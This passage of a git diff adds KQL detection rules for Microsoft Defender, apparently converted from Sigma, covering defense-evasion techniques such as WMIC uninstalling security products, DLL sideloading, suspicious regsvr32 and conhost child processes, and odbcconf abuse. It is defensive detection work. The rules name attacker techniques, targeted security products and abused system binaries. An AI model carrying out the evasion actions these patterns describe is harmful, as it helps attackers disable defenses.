Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql b/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql new file mode 100644 index 00000000..6e2f0e2b --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql @@ -0,0 +1,12 @@ +// Title: Potential Tampering With Security Products Via WMIC +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-01-30 +// Level: high +// Description: Detects uninstallation or termination of security products using the WMIC utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administration + +DeviceProcessEvents +| where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql new file mode 100644 index 00000000..890d0fc3 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential Wazuh Security Platform DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-03-13 +// Level: medium +// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.) + +DeviceImageLoadEvents +| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql b/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql new file mode 100644 index 00000000..06c7af4f --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_werfault_reflectdebugger_registry_value_abuse.kql @@ -0,0 +1,10 @@ +// Title: Potential WerFault ReflectDebugger Registry Value Abuse +// Author: X__Junior +// Date: 2023-05-18 +// Level: high +// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql b/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql new file mode 100644 index 00000000..cdd5f21a --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Windows Defender Tampering Via Wmic.EXE +// Author: frack113 +// Date: 2022-12-11 +// Level: high +// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1562 + +DeviceProcessEvents +| where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql b/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql new file mode 100644 index 00000000..fb937ab7 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Winnti Dropper Activity +// Author: Alexander Rausch +// Date: 2020-06-24 +// Level: high +// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceFileEvents +| where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql b/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql new file mode 100644 index 00000000..060564f2 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql @@ -0,0 +1,12 @@ +// Title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects usage of Dsacls to grant over permissive permissions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate administrators granting over permissive permissions to users + +DeviceProcessEvents +| where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql b/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql new file mode 100644 index 00000000..5b68fc1a --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-14 +// Level: high +// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql new file mode 100644 index 00000000..707953c1 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_cabinet_file_expansion.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Cabinet File Expansion +// Author: Bhabesh Raj, X__Junior (Nextron Systems) +// Date: 2021-07-30 +// Level: medium +// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - System administrator Usage + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:" or ProcessCommandLine contains "–F:" or ProcessCommandLine contains "—F:" or ProcessCommandLine contains "―F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Admin$\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\C$\\" or ProcessCommandLine contains "\\Temporary Internet") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql b/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql new file mode 100644 index 00000000..e22d49ca --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_call_to_win32_nteventlogfile_class.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Call To Win32_NTEventlogFile Class +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-13 +// Level: high +// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql new file mode 100644 index 00000000..f45aa3dd --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_diskshadow_exe.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Child Process Of DiskShadow.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications + +DeviceProcessEvents +| where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql new file mode 100644 index 00000000..83cb720b --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_process_of_regsvr32.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Child Process Of Regsvr32 +// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-05 +// Level: high +// Description: Detects potentially suspicious child processes of "regsvr32.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Unlikely, but can rarely occur. Apply additional filters accordingly. + +DeviceProcessEvents +| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql b/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql new file mode 100644 index 00000000..8b1a76b6 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_child_processes_spawned_by_conhost.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Child Processes Spawned by ConHost +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: high +// Description: Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components. +// MITRE Tactic: Defense Evasion +// Tags: attack.t1202, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate administrative tasks using `conhost.exe` to spawn child processes such as `cmd.exe`, `powershell.exe`, or `regsvr32.exe`. + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cmd.exe", "cscript.exe", "mshta.exe", "powershell_ise.exe", "powershell.exe", "pwsh.dll", "regsvr32.exe", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\conhost.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql new file mode 100644 index 00000000..6ce8288c --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql @@ -0,0 +1,14 @@ +// Title: Potentially Suspicious CMD Shell Output Redirect +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-12 +// Level: medium +// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. +This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql new file mode 100644 index 00000000..990a907d --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_dll_registered_via_odbcconf_exe.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious DLL Registered Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: high +// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql new file mode 100644 index 00000000..b82c97a4 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql @@ -0,0 +1,12 @@ +// Title: Potentially Suspicious DMP/HDMP File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-07 +// Level: medium +// Description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive. + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath endswith ".dmp" or FolderPath endswith ".dump" or FolderPath endswith ".hdmp") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql b/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql new file mode 100644 index 00000000..9543cafb --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_event_viewer_child_process.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Event Viewer Child Process +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql new file mode 100644 index 00000000..b65c479e --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql @@ -0,0 +1,11 @@ +// Title: Potentially Suspicious Execution From Parent Process In Public Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059 + +DeviceProcessEvents +| where ((FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript")) and InitiatingProcessFolderPath contains ":\\Users\\Public\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql new file mode 100644 index 00000000..18f82a6f --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_tmp_folder.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Execution From Tmp Folder +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where FolderPath startswith "/tmp/" and (not(FolderPath endswith "/usr/bin/nextcloud")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql new file mode 100644 index 00000000..39f05471 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-25 +// Level: medium +// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql new file mode 100644 index 00000000..476dd3f0 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-13 +// Level: medium +// Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.009 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".txt") and ((FolderPath endswith "\\Regsvcs.exe" or FolderPath endswith "\\Regasm.exe") or (ProcessVersionInfoOriginalFileName in~ ("RegSvcs.exe", "RegAsm.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql b/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql new file mode 100644 index 00000000..9877b57d --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_googleupdate_child_process.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious GoogleUpdate Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql b/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql new file mode 100644 index 00000000..2a629634 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_office_document_executed_from_trusted_location.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Office Document Executed From Trusted Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: high +// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceProcessEvents +| where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql new file mode 100644 index 00000000..d5dbfc34 --- /dev/null +++ b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql @@ -0,0 +1,11 @@ +// Title: Potentially Suspicious Ping/Copy Command Combination +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "copy ") and (ProcessCommandLine contains " -n " 